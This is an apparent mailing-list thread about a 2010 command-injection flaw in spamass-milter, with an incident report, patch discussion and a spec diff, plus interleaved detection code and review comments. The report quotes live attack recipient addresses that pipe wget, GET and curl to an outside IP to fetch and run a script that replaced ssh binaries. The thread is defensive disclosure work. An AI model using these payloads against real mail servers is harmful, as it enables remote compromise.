Discussion:
[users] spamassassin or spamass-milter exploit
Paul Heinlein
2010-03-16 19:08:17 UTC
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.

The system described below runs x86_64 release of CentOS 5.4. SELinux
was, at the time, in Permissive mode. The packages involved, as far as
I can tell, are

* spamassassin-3.2.5-1.el5.rf
* spamass-milter-0.3.1-1.el5.rf
* sendmail-8.13.8-2.el5 (not rpmforge, obviously)

Mar 15 05:47 (times are PDT): Several messages arrived with suspicious
recipients:

<root+:>
<root+:"|wget http://61.100.185.177/busy-1.php">
<root+:"|GET http://61.100.185.177/busy-2.php">
<root+:"|curl http://61.100.185.177/busy-3.php">

Sendmail recognized the addresses as syntactically evil, but a process
running under the spamass_milter_t context ran wget, GET, and curl and
connected to the IP address in the addresses above.

The file(s) downloaded by these processes executed a shell script. It
did several things, the highlights of which are

1. It downloaded, uncompressed, and untar-ed a file named
xS.tar.gz. The resulting directory name was /xS.

2. It tried to add a unix group and user named "sshd"; the attempt
failed, probably because there's already an sshd user and group
on the system.

3. It installed 32-bit Linux executables in place of /usr/bin/ssh
and /usr/sbin/sshd. The new executables were dynamically linked
against a small number of libraries, but most of the supporting
libraries had been compiled directly into the applications.

4. It installed a minimal /etc/ssh/sshd_config and an empty
/etc/ssh/ssh_config.

5. After verifying that sshd was in the process table, it
removed the /xS directory.

6. It created an empty file named /dev/devno

7. It restarted sshd using /sbin/service

Again, this was all done under the spamass_milter_t security context.

I don't know enough about the sendmail <-> spamass-milter <-> spamd
pipeline to have a definitive idea about what application misparsed
the piped e-mail addresses and executed them.

I saw the attack again this morning, but by then I'd cleaned things up
and gotten SELinux back into Enforcing mode, which prevented the
exploit from working again.
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
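The two observable parts of the report above (the quoted pipe in the recipient local part, and the artefacts left on the host: the /dev/devno marker, the /xS directory, and 32-bit ELF binaries dropped over /usr/bin/ssh and /usr/sbin/sshd on an x86_64 box) can be turned into checks. The Python below is an added example, not code from Paul's post or from the spamass-milter project. The log lines are constructed around the four addresses in the post, and make_fixture() builds a scratch directory tree only so that host_iocs() can be exercised without touching a real system.

```python
"""Checks derived from the incident report above (added example).

Not code from the thread or from spamass-milter. SAMPLE_LOG is constructed
around the recipients in the post; make_fixture() builds a scratch tree so
host_iocs() can be run without touching the real filesystem.
"""
import os
import re
import tempfile

# An angle-bracketed address whose quoted local part starts with a pipe,
# as in <root+:"|wget http://61.100.185.177/busy-1.php">.
ADDR_RE = re.compile(r'<([^<>]*)>')
PIPE_RE = re.compile(r'"\s*\|\s*(?P<cmd>[^\s"]+)')
URL_RE = re.compile(r'https?://[^\s"<>]+')

# Constructed Sendmail-style lines carrying the addresses from the post.
SAMPLE_LOG = [
    'Mar 15 05:47:01 mx sendmail[2101]: to=<root+:>, stat=Sent',
    'Mar 15 05:47:02 mx sendmail[2102]: to=<root+:"|wget http://61.100.185.177/busy-1.php">, reject',
    'Mar 15 05:47:02 mx sendmail[2103]: to=<root+:"|GET http://61.100.185.177/busy-2.php">, reject',
    'Mar 15 05:47:03 mx sendmail[2104]: to=<root+:"|curl http://61.100.185.177/busy-3.php">, reject',
    'Mar 15 05:48:10 mx sendmail[2105]: to=<alice@example.org>, stat=Sent',
]


def suspicious_recipients(lines):
    """Return (address, command, [urls]) for every angle-bracketed address
    whose quoted local part begins with '|'. The URLs are the IOCs to block."""
    hits = []
    for line in lines:
        for addr in ADDR_RE.findall(line):
            m = PIPE_RE.search(addr)
            if m:
                hits.append((addr, m.group('cmd'), URL_RE.findall(addr)))
    return hits


def elf_class(path):
    """32 or 64 for an ELF file, None for anything else (reads 5 bytes:
    the magic plus e_ident[EI_CLASS])."""
    with open(path, 'rb') as fh:
        ident = fh.read(5)
    if len(ident) < 5 or ident[:4] != b'\x7fELF':
        return None
    return {1: 32, 2: 64}.get(ident[4])


def host_iocs(root='/', expect_class=64):
    """Look under a filesystem root for the artefacts the post lists.
    expect_class is the ELF class native to the host (64 on x86_64)."""
    wrong_class = []
    for rel in ('usr/bin/ssh', 'usr/sbin/sshd'):
        path = os.path.join(root, rel)
        if os.path.isfile(path) and elf_class(path) not in (None, expect_class):
            wrong_class.append(rel)
    return {
        'devno_marker': os.path.isfile(os.path.join(root, 'dev', 'devno')),
        'xS_dir': os.path.isdir(os.path.join(root, 'xS')),
        'wrong_class': wrong_class,
    }


def make_fixture():
    """Scratch tree imitating the compromised host (constructed, not real
    data): a 32-bit ELF header at usr/bin/ssh, a 64-bit one at usr/sbin/sshd,
    and the empty dev/devno marker. /xS is deliberately absent, as the
    script removed it after installing."""
    root = tempfile.mkdtemp(prefix='iocs-')
    for rel in ('dev', 'usr/bin', 'usr/sbin'):
        os.makedirs(os.path.join(root, rel))
    open(os.path.join(root, 'dev', 'devno'), 'wb').close()
    with open(os.path.join(root, 'usr', 'bin', 'ssh'), 'wb') as fh:
        fh.write(b'\x7fELF\x01' + b'\x00' * 11)
    with open(os.path.join(root, 'usr', 'sbin', 'sshd'), 'wb') as fh:
        fh.write(b'\x7fELF\x02' + b'\x00' * 11)
    return root


if __name__ == '__main__':
    for addr, cmd, urls in suspicious_recipients(SAMPLE_LOG):
        print('piped recipient:', addr, '->', cmd, urls)
    print(host_iocs(make_fixture(), expect_class=64))
```

On a live host run host_iocs('/') and pair it with `rpm -V openssh-clients openssh-server`; the ELF-class check only catches the cross-architecture case Paul describes, while rpm -V catches any replaced file with the same architecture.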
Paul Heinlein
2010-03-16 21:19:25 UTC
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
Belatedly, I found a notice:

http://seclists.org/fulldisclosure/2010/Mar/267

And some exploit code:

http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Steven Haigh
2010-03-16 23:52:14 UTC
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized:
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X"

Am I reading this right?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 02:19:45 UTC
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"

Am I reading this right as this setup is not vulnerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 03:20:39 UTC
Ah,

It seems that the -x option for spamass-milter is what makes this
vulnerable.

See: http://www.exploit-db.com/exploits/11662

If you don't run spamass-milter with the -x option, this vulnerability
does not work.
Post by Steven Haigh
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"
Am I reading this right as this setup is not vulnerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Yury V. Zaytsev
2010-03-17 08:42:03 UTC
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!

spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what the practical use of it is), so it's not
vulnerable.

However I will be happy to include the patch that upstream is cooking
when it's ready:

http://savannah.nongnu.org/bugs/index.php?29136

I don't have time to track this page and also do not have a Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.

Thanks!
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 04:07:22 UTC
I believe I have created a properly patched SRPM to replace the one on RF;
it should fix all outstanding issues.

It's my first go at making an SRPM, but it compiles and runs OK on my side.

It has 3 patches included:
spamass-milter-0.3.1-popen.patch - Fixes this vulnerability.
spamass-milter-0.3.1-rcvd.patch - Fixes a minor issue with Received
headers
spamass-milter-0.3.1-smtp-auth-bypass.patch - Bypasses scanning for email
sent with SMTP auth.

You can find it at:
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm

If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.

On Wed, 17 Mar 2010 09:42:03 +0100, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!
spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what the practical use of it is), so it's not
vulnerable.
However I will be happy to include the patch that upstream is cooking
http://savannah.nongnu.org/bugs/index.php?29136
I don't have time to track this page and also do not have a Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.
Thanks!
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
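Steven's list names the popen patch as the fix for this vulnerability, and the exploit-db entry cited earlier ties it to the -x recipient expansion. What that bug class looks like, as an added Python illustration (spamass-milter is C++ and its actual code is not reproduced in this thread, so the exact string the vulnerable milter built is an assumption here, taken as `sendmail -bv "<address>"`): building one shell string around the untrusted RCPT TO address hands the quoting to the sender, so the `root+:"|wget ...` address from Paul's post closes the quote and starts a pipeline. An argv list executed without a shell keeps the whole address as a single argument whatever it contains. Nothing below executes a command; shell_words() only tokenises the way /bin/sh would.

```python
"""Shell-string recipient expansion beside an argv-based one (added example).

Python illustration of the bug class the popen patch addresses; not code
from spamass-milter or from the thread. The exact command the vulnerable
milter built is not shown there, so vulnerable_command() assumes the address
was wrapped in double quotes. Requires Python 3.8+ for shlex behaviour.
"""
import shlex
import subprocess

SENDMAIL = '/usr/sbin/sendmail'                              # assumed path
ATTACK = 'root+:"|wget http://61.100.185.177/busy-1.php"'    # from the post
BENIGN = 'root+:'


def vulnerable_command(rcpt):
    """One string destined for popen(3), i.e. for /bin/sh -c. The caller
    quotes the address, so a double quote inside it ends that quoting."""
    return SENDMAIL + ' -bv "' + rcpt + '"'


def shell_words(cmd):
    """Tokenise as a POSIX shell would, with | ; & < > ( ) as operators,
    without executing anything."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def commands_in(cmd):
    """Program names a shell would run for this string, one per pipeline
    stage or command separator."""
    progs, expect_prog = [], True
    for tok in shell_words(cmd):
        if tok in ('|', ';', '&&', '||', '&'):
            expect_prog = True
        elif expect_prog:
            progs.append(tok)
            expect_prog = False
    return progs


def hardened_argv(rcpt):
    """What an execv(3)-based replacement passes: no shell is involved, so
    the address is exactly one argument no matter which characters it holds."""
    return [SENDMAIL, '-bv', rcpt]


def expand_recipient(rcpt, run=subprocess.run):
    """Run the hardened form (shell=False) and return sendmail's output.
    `run` is injectable so the call can be exercised without a sendmail."""
    proc = run(hardened_argv(rcpt), capture_output=True, text=True, timeout=30)
    return proc.stdout


def looks_like_injection(rcpt):
    """Cheap pre-check for logging or rejecting: shell metacharacters in the
    address. A detection aid, not a substitute for dropping the shell."""
    return any(c in rcpt for c in '|;&`$<>"\'\\\n')


if __name__ == '__main__':
    print('shell runs:', commands_in(vulnerable_command(ATTACK)))
    print('argv form :', hardened_argv(ATTACK))
    print('flagged   :', looks_like_injection(ATTACK))
```

The essential change is the one the patch name records: replacing popen() with a fork/exec that receives an argument vector. Filtering metacharacters on top is useful for alerting (the pattern in Paul's logs is exactly what looks_like_injection catches), but on its own it is a denylist that the next encoding trick gets around.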
Yury V. Zaytsev
2010-05-07 07:07:33 UTC
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 08:26:40 UTC
On Fri, 07 May 2010 09:07:33 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS in nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.

To revert to the rf standards, it needs one line edited in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Yury V. Zaytsev
2010-05-07 08:34:29 UTC
Post by Steven Haigh
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.
We never used cvs and you don't have to set up anything to access it:

http://svn.rpmforge.net/svn/trunk/rpms/
Post by Steven Haigh
To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
The point is that I have to download and unpack the SRPM to fish your
patches out on a system that does not even have rpm installed.

Why does everybody give links to some obscure SRPMs when it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster?
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 09:18:42 UTC
On Fri, 07 May 2010 10:34:29 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Why does everybody give links to some obscure SRPMs when it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster?
Ok, here is the lot. Please remove the existing smtp auth patch by me as I
created a new one with the same options to make things much more uniform
across this package. I've also edited the changelog and bumped the release
to 3.
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
-------------- next part --------------
--- spamass-milter.spec.orig 2010-03-08 00:02:19.000000000 +1100
+++ spamass-milter.spec 2010-05-07 19:12:53.000000000 +1000
@@ -5,14 +5,16 @@
Summary: Sendmail milter for spamassassin
Name: spamass-milter
Version: 0.3.1
-Release: 2%{?dist}
+Release: 3%{?dist}
License: GPL
Group: System Environment/Daemons
URL: http://savannah.gnu.org/projects/spamass-milt/

Source: http://savannah.nongnu.org/download/spamass-milt/spamass-milter-%{version}.tar.gz

-Patch0: spamass-milter-smtp-auth.patch
+Patch0: spamass-milter-0.3.1-smtp-auth-bypass.patch
+Patch1: spamass-milter-0.3.1-popen.patch
+Patch2: spamass-milter-0.3.1-rcvd.patch

BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-root

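Review bot: renaming Patch0 from spamass-milter-smtp-auth.patch to spamass-milter-0.3.1-smtp-auth-bypass.patch changes a source file name, so the old patch has to be deleted from the package sources in the same commit or the spec directory carries a dead file, and none of the three Patch lines says what it fixes. Add a comment above each, for instance `# CVE-2010-1132, http://savannah.nongnu.org/bugs/index.php?29136` above Patch1 and the Savannah/Debian/Red Hat bug numbers above Patch2, so the next maintainer can tell the security fix from the cosmetic one without opening the patches.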
@@ -26,7 +28,9 @@

%prep
%setup -q
-%patch0 -p0 -b .smtpauth
+%patch0 -p1 -b .smtpauth
+%patch1 -p1 -b .popen
+%patch2 -p1 -b .rcvd

%{__cat} <<EOF >spamass-milter.sysconfig
### Override for your different local config
@@ -154,6 +158,10 @@
%{_sbindir}/spamass-milter

%changelog
+* Fri May 07 2010 Steven Haigh <netwiz at crc.id.au> - 0.3.1.3
+- Added patch to fix CVE-2010-1132.
+- Added patch to fix Received-header generation; this adds a space before the "(" between macro_j and macro_v.)
+
* Sun Mar 07 2010 Yury V. Zaytsev <yury at shurup.com> - 0.3.1-2
- Added SMTP AUTH patch by Steven Haigh.

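Review bot: the version string in the new changelog entry, `0.3.1.3`, matches neither the `Release: 3%{?dist}` it documents nor the `0.3.1-2` form of the entry below it; it should read `0.3.1-3`. The Received-header line also ends with a stray `)` after the closing quote and describes only the added space, while the rcvd patch further down in this mail also inserts `;` before the date and the missing `)` after envelope-from, and the regenerated SMTP AUTH patch is not mentioned at all.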
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-popen.patch
Type: text/x-c
Size: 8008 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment.bin
-------------- next part --------------
The code in spamass-milter.cpp that tries to create a
Sendmail-compatible header is broken and generates a header
that is incorrectly parsed by SpamAssassin.

This is mostly fixed in CVS apart from the space that needs
adding prior to the "(" between macro_j and macro_v.

https://savannah.nongnu.org/bugs/index.php?17178
http://bugs.debian.org/510665
http://bugzilla.redhat.com/496763

--- spamass-milter-0.3.1/spamass-milter.cpp.ori 2006-03-23 15:41:36.000000000 -0600
+++ spamass-milter-0.3.1/spamass-milter.cpp 2009-04-20 20:03:31.000000000 -0500
@@ -1002,9 +1002,9 @@

assassin->output((string)
"Received: from "+macro_s+" ("+macro__+")\r\n\t"+
- "by "+macro_j+"("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+"\r\n\t"+
+ "by "+macro_j+" ("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+";\r\n\t"+
macro_b+"\r\n\t"+
- "(envelope-from "+assassin->from()+"\r\n");
+ "(envelope-from "+assassin->from()+")\r\n");

} else
assassin->output((string)"X-Envelope-To: "+envrcpt[0]+"\r\n");
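Review bot: the description above says only a space before `(` is needed, but this hunk changes three things: the space after macro_j, a `;` appended after macro_i so it precedes macro_b (the date), and the `)` closing the `(envelope-from` clause. The `;` is the part that makes the header parse, since the date in a Received header is separated from the `from ... by ... id ...` clauses by exactly that semicolon, so the patch description should list it rather than the space alone. Since the header notes that upstream CVS already has most of this, it is worth checking that CVS emits the same `;` and `)`, or the two trees diverge again on the next rebase.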
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-smtp-auth-bypass.patch
Type: text/x-c
Size: 1232 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0001.bin
Steven Haigh
2010-05-07 09:18:42 UTC
Permalink
On Fri, 07 May 2010 10:34:29 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
Ok, here is the lot. Please remove the existing smtp auth patch by me as I
created a new one with the same options to make things much more uniform
across this package. I've also edited the changelog and bumped the release
to 3.
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
-------------- next part --------------
--- spamass-milter.spec.orig 2010-03-08 00:02:19.000000000 +1100
+++ spamass-milter.spec 2010-05-07 19:12:53.000000000 +1000
@@ -5,14 +5,16 @@
Summary: Sendmail milter for spamassassin
Name: spamass-milter
Version: 0.3.1
-Release: 2%{?dist}
+Release: 3%{?dist}
License: GPL
Group: System Environment/Daemons
URL: http://savannah.gnu.org/projects/spamass-milt/

Source: http://savannah.nongnu.org/download/spamass-milt/spamass-milter-%{version}.tar.gz

-Patch0: spamass-milter-smtp-auth.patch
+Patch0: spamass-milter-0.3.1-smtp-auth-bypass.patch
+Patch1: spamass-milter-0.3.1-popen.patch
+Patch2: spamass-milter-0.3.1-rcvd.patch

BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-root

@@ -26,7 +28,9 @@

%prep
%setup -q
-%patch0 -p0 -b .smtpauth
+%patch0 -p1 -b .smtpauth
+%patch1 -p1 -b .popen
+%patch2 -p1 -b .rcvd

%{__cat} <<EOF >spamass-milter.sysconfig
### Override for your different local config
@@ -154,6 +158,10 @@
%{_sbindir}/spamass-milter

%changelog
+* Fri May 07 2010 Steven Haigh <netwiz at crc.id.au> - 0.3.1.3
+- Added patch to fix CVE-2010-1132.
+- Added patch to fix Received-header generation; this adds a space before the "(" between macro_j and macro_v.)
+
* Sun Mar 07 2010 Yury V. Zaytsev <yury at shurup.com> - 0.3.1-2
- Added SMTP AUTH patch by Steven Haigh.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-popen.patch
Type: text/x-c
Size: 8008 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0002.bin
-------------- next part --------------
The code in spamass-milter.cpp that tries to create a
Sendmail-compatible header is broken and generates a header
that is incorrectly parsed by SpamAssassin.

This is mostly fixed in CVS apart from the space that needs
adding prior to the "(" between macro_j and macro_v.

https://savannah.nongnu.org/bugs/index.php?17178
http://bugs.debian.org/510665
http://bugzilla.redhat.com/496763

--- spamass-milter-0.3.1/spamass-milter.cpp.ori 2006-03-23 15:41:36.000000000 -0600
+++ spamass-milter-0.3.1/spamass-milter.cpp 2009-04-20 20:03:31.000000000 -0500
@@ -1002,9 +1002,9 @@

assassin->output((string)
"Received: from "+macro_s+" ("+macro__+")\r\n\t"+
- "by "+macro_j+"("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+"\r\n\t"+
+ "by "+macro_j+" ("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+";\r\n\t"+
macro_b+"\r\n\t"+
- "(envelope-from "+assassin->from()+"\r\n");
+ "(envelope-from "+assassin->from()+")\r\n");

} else
assassin->output((string)"X-Envelope-To: "+envrcpt[0]+"\r\n");
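Review bot: the replacement lines fix three separate defects, and the patch description only mentions the first: the space before "(" keeps the version comment from being glued to macro_j, the ";" before macro_b is what delimits the date-time in the Received grammar, and the trailing ")" closes the "(envelope-from" comment that was otherwise left open to the end of the header. Since each of the three linked bug reports covers a different part of this, it would be worth adding a one-message regression check that compares the Received line handed to SpamAssassin against the expected form before this goes into the repository.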
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-smtp-auth-bypass.patch
Type: text/x-c
Size: 1232 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0003.bin
Yury V. Zaytsev
2010-05-07 08:34:29 UTC
Permalink
Post by Steven Haigh
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS in nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.
We never used CVS, and you don't have to set up anything to access it:

http://svn.rpmforge.net/svn/trunk/rpms/
Post by Steven Haigh
To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
The point is that I have to download and unpack the SRPM to fish your
patches out on a system that does not even have rpm installed.

Why does everybody give links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 08:26:40 UTC
Permalink
On Fri, 07 May 2010 09:07:33 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS in nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.

To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Yury V. Zaytsev
2010-05-07 07:07:33 UTC
Permalink
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 04:07:22 UTC
Permalink
I believe I have created a properly patched SRPM to replace the one on RF
with, which should fix all outstanding issues.

It's my first go at making an SRPM, but it compiles and runs OK on my side.

It has 3 patches included:
spamass-milter-0.3.1-popen.patch - Fixes this vulnerability.
spamass-milter-0.3.1-rcvd.patch - Fixes a minor issue with Received
headers
spamass-milter-0.3.1-smtp-auth-bypass.patch - Bypasses scanning for email
sent with SMTP auth.

You can find it at:
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm

If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.

On Wed, 17 Mar 2010 09:42:03 +0100, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!
spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what the practical use of it is), so it's not
vulnerable.
However I will be happy to include the patch that upstream is cooking
http://savannah.nongnu.org/bugs/index.php?29136
I don't have time to track this page and also do not have a Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.
Thanks!
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Paul Heinlein
2010-03-16 19:08:17 UTC
Permalink
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.

The system described below runs x86_64 release of CentOS 5.4. SELinux
was, at the time, in Permissive mode. The packages involved, as far as
I can tell, are

* spamassassin-3.2.5-1.el5.rf
* spamass-milter-0.3.1-1.el5.rf
* sendmail-8.13.8-2.el5 (not rpmforge, obviously)

Mar 15 05:47 (times are PDT): Several messages arrived with suspicious
recipients:

<root+:>
<root+:"|wget http://61.100.185.177/busy-1.php">
<root+:"|GET http://61.100.185.177/busy-2.php">
<root+:"|curl http://61.100.185.177/busy-3.php">

Sendmail recognized the addresses as syntactically evil, but a process
running under the spamass_milter_t context ran wget, GET, and curl and
connected to the IP address in the addresses above.

The file(s) downloaded by these processes executed a shell script. It
did several things, the highlights of which are

1. It downloaded, uncompressed, and untar-ed a file named
xS.tar.gz. The resulting directory name was /xS.

2. It tried to add a unix group and user named "sshd"; the attempt
failed, probably because there's already an sshd user and group
on the system.

3. It installed 32-bit Linux executables in place of /usr/bin/ssh
and /usr/sbin/sshd. The new executables were dynamically linked
against a small number of libraries, but most of the supporting
libraries had been compiled directly into the applications.

4. It installed a minimal /etc/ssh/sshd_config and an empty
/etc/ssh/ssh_config.

5. After verifying that sshd was in the process table, it
